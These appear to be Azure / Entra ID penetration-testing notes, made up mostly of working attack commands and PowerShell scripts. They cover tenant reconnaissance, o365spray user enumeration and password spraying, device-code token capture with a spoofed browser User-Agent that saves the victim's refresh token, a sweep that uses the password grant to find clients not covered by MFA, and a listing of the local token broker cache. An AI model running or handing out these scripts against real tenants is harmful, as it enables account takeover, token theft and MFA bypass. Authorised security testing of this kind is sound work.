- https://bhavsec.com/posts/intro-to-azure-pentesting/
- https://sofblocks.github.io/azure-cloud-pentesting/
- https://blog.xpnsec.com/azuread-connect-for-redteam/
- [PDF] Dumping NTHashes from Azure AD (Dr Nestori Syynimaa, @DrAzureAD)
OpenID configuration (a verified domain name such as megacorp.cloud works in place of <TENANT_ID>; the issuer field of the response carries the tenant GUID):
$ curl -s https://login.microsoftonline.com/<TENANT_ID>/v2.0/.well-known/openid-configuration | jq
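Tenant recon in one step, as an added example that is not part of the original notes: it resolves a domain to its tenant GUID through the same openid-configuration document and asks getuserrealm.srf whether the namespace is Managed (cloud-only passwords) or Federated (redirected to an on-prem IdP), which decides where a later password spray actually lands. It assumes the public login.microsoftonline.com endpoints; megacorp.cloud is the notes' example domain.

```powershell
# Added example (not from the original notes). Assumes the public
# login.microsoftonline.com endpoints; "megacorp.cloud" is the notes' example domain.
function Get-TenantInfo {
    param([Parameter(Mandatory)][string]$Domain)
    $base = "https://login.microsoftonline.com"

    # The OpenID metadata document accepts a verified domain in place of the tenant GUID;
    # the issuer it returns is https://login.microsoftonline.com/<GUID>/v2.0.
    # An unknown domain yields HTTP 400 (AADSTS90002, tenant not found).
    $tenantId = $null; $region = $null
    try {
        $oidc = Invoke-RestMethod -UseBasicParsing -Uri "$base/$Domain/v2.0/.well-known/openid-configuration"
        $tenantId = ($oidc.issuer -split "/")[3]
        $region   = $oidc.tenant_region_scope
    } catch {
        Write-Warning "$Domain is not a verified domain of any tenant (or the request failed): $($_.Exception.Message)"
    }

    # getuserrealm.srf answers for any login name; only the domain part matters.
    # NameSpaceType is Managed, Federated or Unknown; AuthURL is the federation endpoint when Federated.
    $realm = Invoke-RestMethod -UseBasicParsing -Uri "$base/getuserrealm.srf?login=nobody@$Domain&json=1"

    [pscustomobject]@{
        Domain          = $Domain
        TenantId        = $tenantId
        TenantRegion    = $region
        NamespaceType   = $realm.NameSpaceType
        FederationBrand = $realm.FederationBrandName
        AuthUrl         = $realm.AuthURL
    }
}

Get-TenantInfo -Domain megacorp.cloud
```

A Federated result means credentials submitted to Entra ID are forwarded to the customer's IdP (typically AD FS), so lockout policy, logging and MFA behaviour there apply to the spray, not the tenant's smart lockout.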
Using o365spray (random user agents here):
$ pipx install -f "git+https://github.com/0xZDH/o365spray.git"
$ o365spray --validate -d megacorp.cloud
$ o365spray --enum -d megacorp.cloud -u snovvcrash
$ o365spray --enum -d megacorp.cloud -U names.txt
$ o365spray --spray -d megacorp.cloud -U names.txt -p 'Passw0rd!' --sleep 5 --rate 1 --useragents ua.txt
$ roadrecon auth --device-code [-ua '<USER_AGENT>']
$ roadrecon gather [-d megacorp.db] [-ua '<USER_AGENT>']
$ roadrecon gui [-d megacorp.db]
- https://github.com/BloodHoundAD/AzureHound
- https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
Get the device_code (the client_id is the first-party Microsoft Azure PowerShell app; the refresh_token obtained through it is what AzureHound consumes below):
$body = @{
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
"resource" = "https://graph.microsoft.com"
}
# Spoof a browser User-Agent so the request does not stand out as a scripted client
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
$Headers = @{}
$Headers["User-Agent"] = $UserAgent
$authResponse = Invoke-RestMethod `
-UseBasicParsing `
-Method Post `
-Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
-Headers $Headers `
-Body $body
# .message holds the verification URL and user_code; the device_code below is what the token request polls with
$authResponse
Get the refresh_token (this only succeeds after the user has entered the code; until then the endpoint answers HTTP 400 with error authorization_pending, so re-run or poll it before expires_in elapses):
$body = @{
"client_id" = "1950a258-227b-4e31-a9cf-717495945fc2"
"grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
"code" = $authResponse.device_code
}
$tokens = Invoke-RestMethod `
-UseBasicParsing `
-Method Post `
-Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" `
-Headers $Headers `
-Body $body
# .access_token is scoped to the resource requested above; .refresh_token is the reusable one
$tokens
Collect data providing the refresh_token:
$ eget -qs linux/amd64 "BloodHoundAD/AzureHound" --to ~/tools/BloodHound
$ ~/tools/BloodHound/azurehound -r "<REFRESH_TOKEN>" list --tenant megacorp.cloud --json -o azure_megacorp.cloud.json
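The whole device-code procedure above in one script, as an added example that is not part of the original notes: it requests the device code, prints the message to hand to the user, then polls the token endpoint at the interval the server specifies, handling authorization_pending and slow_down instead of failing on the first 400, and finally writes the refresh_token to a file for the azurehound -r invocation. It assumes the same v1 endpoints, client_id and resource as the notes; the output file name refresh_token.txt is this example's choice.

```powershell
# Added example (not from the original notes). Assumes the v1 device-code and token endpoints,
# the Azure PowerShell client_id and the Graph resource used in the notes above;
# refresh_token.txt is an arbitrary output file name.
$ClientId  = "1950a258-227b-4e31-a9cf-717495945fc2"
$Resource  = "https://graph.microsoft.com"
$UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
$Headers   = @{ "User-Agent" = $UserAgent }

# Step 1: request a device code; .message is the text to show the user
$authResponse = Invoke-RestMethod -UseBasicParsing -Method Post `
    -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" `
    -Headers $Headers `
    -Body @{ client_id = $ClientId; resource = $Resource }
Write-Host $authResponse.message

# Step 2: poll the token endpoint until the user completes sign-in or the code expires
$body = @{
    client_id  = $ClientId
    grant_type = "urn:ietf:params:oauth:grant-type:device_code"
    code       = $authResponse.device_code
}
$interval = [int]$authResponse.interval
$deadline = (Get-Date).AddSeconds([int]$authResponse.expires_in)
$tokens   = $null
while (-not $tokens -and (Get-Date) -lt $deadline) {
    Start-Sleep -Seconds $interval
    try {
        $tokens = Invoke-RestMethod -UseBasicParsing -Method Post `
            -Uri "https://login.microsoftonline.com/common/oauth2/token?api-version=1.0" `
            -Headers $Headers -Body $body
    } catch {
        # Entra ID returns the OAuth error as a JSON body with HTTP 400; read it on both PS 5.1 and 7+
        $raw = if ($_.ErrorDetails.Message) { $_.ErrorDetails.Message } else { (New-Object IO.StreamReader($_.Exception.Response.GetResponseStream())).ReadToEnd() }
        $err = $raw | ConvertFrom-Json
        if ($err.error -eq "authorization_pending") {
            # user has not entered the code yet; keep polling
        } elseif ($err.error -eq "slow_down") {
            $interval += 5   # server asked for a longer polling interval
        } else {
            throw "Device code flow failed: $($err.error) - $($err.error_description)"
        }
    }
}
if (-not $tokens) { throw "Device code expired before the user signed in" }

# Step 3: persist the refresh token for azurehound -r / roadrecon auth --refresh-token
$tokens.refresh_token | Out-File -NoNewline -Encoding ascii refresh_token.txt
Write-Host "Access token for $($tokens.resource) obtained; refresh token written to refresh_token.txt"
```

The refresh token is what matters: access tokens expire in about an hour, while the refresh token keeps issuing new ones for the resources the client is allowed, which is why AzureHound takes it rather than an access token.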
- https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-azuread/az-conditional-access-policies-mfa-bypass
- https://www.pentestpartners.com/security-blog/bypassing-mfa-on-microsoft-azure-entra-id/
Check whether MFA / Conditional Access is actually enforced for a given client and resource by authenticating with well-known first-party client GUIDs (here Azure AD PowerShell against Exchange Online); a policy that only targets some apps lets the others sign in without MFA:
$ proxy roadrecon auth -u <USERNAME>@megacorp.cloud -p 'Passw0rd!' -r https://outlook.office.com/ -c 1b730954-1685-4b74-9bfd-dac224a7b894 --tokens-stdout
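The same check swept across several client/resource pairs, as an added example that is not part of the original notes or of roadrecon: it runs the v1 password (ROPC) grant with a known password and maps the AADSTS error codes to a verdict, so you see in one table which combinations hand out a token without MFA. The client IDs are Microsoft first-party apps (Azure PowerShell and Azure AD PowerShell from the notes, plus Azure CLI and Microsoft Office); alice@megacorp.cloud and the password are constructed sample input.

```powershell
# Added example (not from the original notes). Assumes the v1 token endpoint and that the
# password is already known; every attempt is a real, logged sign-in and counts towards lockout.
$Clients = [ordered]@{
    "Azure PowerShell"    = "1950a258-227b-4e31-a9cf-717495945fc2"
    "Azure AD PowerShell" = "1b730954-1685-4b74-9bfd-dac224a7b894"
    "Azure CLI"           = "04b07795-8ddb-461a-bbee-02f9e1bf7b46"
    "Microsoft Office"    = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
}
$Resources = @(
    "https://graph.microsoft.com",
    "https://outlook.office.com/",
    "https://management.azure.com/"
)
$Headers = @{ "User-Agent" = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" }

function Invoke-MfaSweep {
    param([Parameter(Mandatory)][string]$Username, [Parameter(Mandatory)][string]$Password)
    foreach ($name in $Clients.Keys) {
        foreach ($resource in $Resources) {
            $body = @{
                grant_type = "password"          # ROPC: no browser, so only policies targeting this client/resource apply
                client_id  = $Clients[$name]
                resource   = $resource
                username   = $Username
                password   = $Password
            }
            try {
                $t = Invoke-RestMethod -UseBasicParsing -Method Post `
                    -Uri "https://login.microsoftonline.com/common/oauth2/token?api-version=1.0" `
                    -Headers $Headers -Body $body
                $verdict = "NO MFA: token issued (refresh_token length $($t.refresh_token.Length))"
            } catch {
                $raw  = if ($_.ErrorDetails.Message) { $_.ErrorDetails.Message } else { (New-Object IO.StreamReader($_.Exception.Response.GetResponseStream())).ReadToEnd() }
                $code = ($raw | ConvertFrom-Json).error_codes[0]
                $verdict = switch ($code) {
                    50076   { "MFA required" }
                    50079   { "MFA enrollment required" }
                    50158   { "external MFA challenge (third-party provider)" }
                    53003   { "blocked by Conditional Access" }
                    50126   { "invalid credentials" }
                    50053   { "account locked (smart lockout)" }
                    50057   { "account disabled" }
                    65001   { "consent required (client not approved in tenant)" }
                    default { "AADSTS$code" }
                }
            }
            [pscustomobject]@{ Client = $name; Resource = $resource; Result = $verdict }
            Start-Sleep -Seconds 2   # keep it slow; each attempt shows up in the sign-in logs
        }
    }
}

# Constructed sample input; replace with the real account and password
Invoke-MfaSweep -Username "alice@megacorp.cloud" -Password 'Passw0rd!' | Format-Table -AutoSize
```

Read the table for rows that say NO MFA: those are the client/resource pairs the Conditional Access policy does not cover, and the refresh_token from such a row is what you feed to roadrecon or AzureHound. A row reading "invalid credentials" for every client means the password is wrong, not that MFA is off, so stop early rather than burning lockout attempts.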
PS > ls C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\*